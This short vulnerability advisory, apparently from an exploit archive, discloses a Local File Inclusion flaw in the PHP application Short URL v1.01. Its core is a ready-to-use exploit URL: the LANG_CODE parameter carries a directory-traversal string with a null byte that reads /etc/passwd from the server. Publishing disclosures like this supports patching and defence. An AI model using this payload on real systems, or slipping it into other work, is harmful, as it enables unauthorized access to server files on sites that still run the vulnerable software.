id: 9627
date: 03/16/2010
title: Short URL v1.01 - Local File Inclusion Vulnerability
author: Pouya Daneshmand
cves: 

====================================================
Short URL v1.01 - Local File Inclusion Vulnerability
====================================================

#################################################################
# Application Info:
# Name: Short URL
# Version: 1.01
# Vendor: http://www.phpkobo.com/short_url.php
#################################################################
# Vulnerability Info:
# Type: Local File Inclusion
# Risk: Medium
#################################################################
Vulnerability:
http://site.com/staff/app/common.inc.php?LANG_CODE=../../../../../../../etc/passwd%00
#################################################################



#  0day.today [2023-03-27]  #